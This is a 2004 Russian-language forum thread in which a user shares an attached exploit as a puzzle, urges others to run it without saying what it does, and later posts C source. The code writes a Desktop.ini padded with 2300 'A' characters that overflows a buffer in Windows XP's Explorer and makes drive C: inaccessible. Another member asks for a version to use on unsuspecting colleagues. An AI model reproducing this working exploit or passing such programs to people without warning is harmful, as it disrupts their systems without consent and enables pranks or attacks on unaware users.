Дырка в Винде ХР.

Разговоры на любые темы: вы можете обсудить здесь какой-либо сайт, найти единомышленников или просто пообщаться...

С какого раза догадались

Опрос закончился 23.04.2004 (Пт) 18:37

С первого
2
20%
Со второго/третьего
1
10%
С большего
1
10%
Не догадался
6
60%
 
Всего голосов : 10

SeRRg
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 343
Зарегистрирован: 25.11.2003 (Вт) 20:14
Откуда: Тюмень!

Дырка в Винде ХР.

Сообщение SeRRg » 13.04.2004 (Вт) 18:37

Всем иметелям :) WindowsXP SP1 посвящается:

Я тут недавно натолкнулся на описание "дырки" в Windows.
По-моему классная весчь, тем более всего 10 строк кода на VC++.
Короче, предлагаю всем желающим запустить ее у себя и заценить эффект.
Кто сможет догадаться, в чем дырка, может взять конфетку - хорошо комп лечит.
А кто не сможет... Запустите еще раз, и эффект исчезнет.
НО. скопируйте прогу на раб.стол., и ЗАПУСКАЙТЕ С НЕГО, а иначе придется
мурыжиться.

Файл прилагается, исходники м.б. потом выложу, когда опрос закончится.
У вас 10 дней, чтобы голосовать.
Вложения
Exploit.zip
(17.09 Кб) Скачиваний: 75
VB - это звучит!

A.A.Z.
Член-корреспондент академии VBStreets
Член-корреспондент академии VBStreets
 
Сообщения: 3035
Зарегистрирован: 30.06.2003 (Пн) 13:38

Сообщение A.A.Z. » 13.04.2004 (Вт) 20:49

Удалено по просьбе SeRRg
Последний раз редактировалось A.A.Z. 14.04.2004 (Ср) 16:38, всего редактировалось 2 раз(а).
Нет меня больше

Amed
Алфизик
Алфизик
 
Сообщения: 5346
Зарегистрирован: 09.03.2003 (Вс) 9:26

Сообщение Amed » 14.04.2004 (Ср) 3:48

У меня тоже ничего... Кажется, у меня с A.A.Z. не SP1 :)

SeRRg
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 343
Зарегистрирован: 25.11.2003 (Вт) 20:14
Откуда: Тюмень!

Сообщение SeRRg » 14.04.2004 (Ср) 8:35

Может, у вас уже заплатки нужные стоят?
У меня Windows XP Professional Edition SP1 без всяких заплаток. И все идет.

A.A.Z, отредактируй топик, не мешай людям думать :).
VB - это звучит!

Tarik
Агент Системы
Агент Системы
Аватара пользователя
 
Сообщения: 1222
Зарегистрирован: 03.01.2003 (Пт) 16:05
Откуда: Москва

Сообщение Tarik » 14.04.2004 (Ср) 19:30

А запускать надо именно с Рабочего стола и под стандартным шеллом? А то у меня Aston, я скопировал в Docs and settings\tarik\Рабочий стол - вроде ничего :? ...
Изображение

Ever tried? Ever failed? No matter. Try again! Fail again! Fail better!

ilia_night
Новичок
Новичок
 
Сообщения: 32
Зарегистрирован: 14.01.2004 (Ср) 20:31
Откуда: Невинномысск

Сообщение ilia_night » 15.04.2004 (Чт) 14:59

а что прога делает
Лень двигатель прогресса!!

Sirik
Perspicaz
Perspicaz
Аватара пользователя
 
Сообщения: 2280
Зарегистрирован: 19.02.2004 (Чт) 16:09
Откуда: Бердичев, Украина

Сообщение Sirik » 15.04.2004 (Чт) 15:30

Да, прога то что надо. А для Окон 9x у Вас ничего нет ???
Я был в ужасе, когда не увидел свой С!!! :twisted:
Хочу, чтобы коллеги тоже это прочувствовали. Проблемма в том, что у них стоят либо Me, либо 98.
Помогите!!!
Состояний же любви — десять: любовный взгляд, привязанность в мыслях, рождение желания, бессонница, исхудание, отвращение к предметам восприятия, утрата стыда, безумие, потеря сознания и смерть — вот их признаки

SeRRg
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 343
Зарегистрирован: 25.11.2003 (Вт) 20:14
Откуда: Тюмень!

Сообщение SeRRg » 15.04.2004 (Чт) 16:14

Tarik: под стандартным Shell'ом.
Запускать можно откуда угодно с диска C:\,
но потом - смотри ниже.

ilia_nightЧто делает: А вы попробуйте открыть диск C:\
Если откроется, значит у вас не пошла прога.[/b]
VB - это звучит!

hCORe
VB - Экстремал
VB - Экстремал
Аватара пользователя
 
Сообщения: 2332
Зарегистрирован: 22.02.2003 (Сб) 15:21
Откуда: parent directory

Сообщение hCORe » 15.04.2004 (Чт) 16:49

У меня все нормально, диск C: не исчезает :lol:
Я так думаю, что здесь имела место модификация параметра реестра, отвечавшего за политики отображения значков в "моем компьютере". Вполне возможно, правда? :oops:
И, конечно, может быть банальное переполнение буфера 8)
Моду создают модоки, а распространяют модозвоны.

Sirik
Perspicaz
Perspicaz
Аватара пользователя
 
Сообщения: 2280
Зарегистрирован: 19.02.2004 (Чт) 16:09
Откуда: Бердичев, Украина

Сообщение Sirik » 15.04.2004 (Чт) 16:57

На счёт отображения значков... я не думаю: у меня диск не открывался даже в Total'е, и в VC.
Может действительно переполнение... :?:
Состояний же любви — десять: любовный взгляд, привязанность в мыслях, рождение желания, бессонница, исхудание, отвращение к предметам восприятия, утрата стыда, безумие, потеря сознания и смерть — вот их признаки

Urvin
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 518
Зарегистрирован: 04.06.2003 (Ср) 10:47
Откуда: с Марса

Сообщение Urvin » 16.04.2004 (Пт) 13:08

Фига-а-а-а-а-ф-ф-ф-ф-ф....
Куызусе блин Respect
Не так страшен русский танк, как его пьяный экипаж

hCORe
VB - Экстремал
VB - Экстремал
Аватара пользователя
 
Сообщения: 2332
Зарегистрирован: 22.02.2003 (Сб) 15:21
Откуда: parent directory

Сообщение hCORe » 16.04.2004 (Пт) 15:36

Ошибка в какой-то из системных служб? RPC например 8)
Моду создают модоки, а распространяют модозвоны.

Tarik
Агент Системы
Агент Системы
Аватара пользователя
 
Сообщения: 1222
Зарегистрирован: 03.01.2003 (Пт) 16:05
Откуда: Москва

Сообщение Tarik » 16.04.2004 (Пт) 20:45

Или в Диспетчере логических дисков...
Изображение

Ever tried? Ever failed? No matter. Try again! Fail again! Fail better!

SeRRg
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 343
Зарегистрирован: 25.11.2003 (Вт) 20:14
Откуда: Тюмень!

Сообщение SeRRg » 17.04.2004 (Сб) 16:54

Подсказка. Переустановка Windows не поможет, замена всех файлов из архива - тоже.
VB - это звучит!

A.A.Z.
Член-корреспондент академии VBStreets
Член-корреспондент академии VBStreets
 
Сообщения: 3035
Зарегистрирован: 30.06.2003 (Пн) 13:38

Сообщение A.A.Z. » 18.04.2004 (Вс) 12:33

Может, буква диска сменяется на нулевую?
Как в Partition Magic - можно вообще убрать букву
Нет меня больше

SeRRg
Постоялец
Постоялец
Аватара пользователя
 
Сообщения: 343
Зарегистрирован: 25.11.2003 (Вт) 20:14
Откуда: Тюмень!

Сообщение SeRRg » 18.04.2004 (Вс) 12:58

Внимание: ИСХОДНИКИ.

#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300
void main(){

char path[256];
char evil[BUFF+1]="";
FILE *bof;
struct stat st;
strcpy(path,"\\pont");
mkdir(path);
SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

strcat(path,"\\Desktop.ini");
if (stat(path,&st)==0)
{ remove(path); exit(1);}//just execute this program twice to remote this file :P
bof=fopen(path,"w");
fputs("[.ShellClassInfo]\n",bof);
memset(evil,'A',BUFF);
fputs(evil,bof);
fclose(bof);
}

Т. Е. она просто создает определенный файл (desktop.ini) в директории pont,
как заметил A.A.Z.

Описание функции, которая вызывается в процессе парсинга desktop.ini (описание взято из MSDN)

DWORD GetPrivateProfileSection(
LPCTSTR lpAppName,
LPTSTR lpReturnedString,
DWORD nSize,
LPCTSTR lpFileName
);

Microsoft специфицирует параметр nSize следующим образом: размер буфера, на который указывает lpReturnedString, в TCHAR’ах. Что и является корнем всей проблемы, так как при использовании UNICODE кодировки размер должен считаться WCHAR’ами. То есть 1 для nSize равен sizeof(TCHAR) а должно быть sizeof(WCHAR).

В результате: Переполнение буфера в Explorer.exe со всеми вытекающими последствиями.
VB - это звучит!


Вернуться в Народный треп

Кто сейчас на конференции

Сейчас этот форум просматривают: Google-бот и гости: 58

    TopList  
cron